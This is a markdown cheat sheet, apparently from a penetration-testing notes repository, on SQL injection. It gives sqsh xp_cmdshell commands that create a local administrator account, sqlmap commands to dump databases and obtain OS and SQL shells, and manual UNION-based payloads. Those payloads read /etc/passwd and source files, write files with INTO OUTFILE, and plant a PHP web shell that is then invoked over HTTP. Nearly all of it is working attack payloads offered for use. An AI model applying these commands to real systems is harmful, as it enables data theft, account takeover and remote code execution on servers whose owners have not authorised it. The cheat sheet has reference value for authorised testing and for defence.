Skip to content

Latest commit

 

History

History
160 lines (107 loc) · 3.09 KB

0-SQL-Injection.md

File metadata and controls

160 lines (107 loc) · 3.09 KB

SQL Injection

Sqsh

Interactive MS SQL shell

Login

sqsh -S <ip>:<port> -U sa -P password

commands

exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go

SQLMap

Easy Scanning option

sqlmap -u "http://example.com/login.php"

List all databases at the site

sqlmap -u "http://example.com/login.php" --dbs

List all tables in a specific database

sqlmap -u "http://example.com/login.php" -D db_name --tables

Dump the contents of a DB table

sqlmap -u "http://example.com/login.php" -D db_name -T table_name –dump

List all columns in a table

sqlmap -u "http://example.com/login.php" -D db_name -T table_name --columns

Dump only selected columns

sqlmap -u "http://example.com/login.php" -D db_name -T users -C username,password --dump

Dump a table from a database when you have admin credentials

sqlmap -u "http://example.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D db_name -T table_name –dump

Get OS Shell

sqlmap --dbms=mysql -u "http://example.com/login.php" --os-shell

Get SQL Shell

sqlmap --dbms=mysql -u "http://example.com/login.php" --sql-shell

Sql Injection cheatsheet

check for sqli vulnerability

?id=1'

find the number of columns

?id=1 order by 9 -- -

Find space to output db

?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

Get username of the sql-user

?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

Get version

?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

Get all tables

?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

Get all columns from a specific table

?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)

?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

read file

?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

create a file and call it to check if really created

?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

create a file to get a shell

?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

then go to browser and see if you can execute commands

http://<ip>/shell.php?cmd=id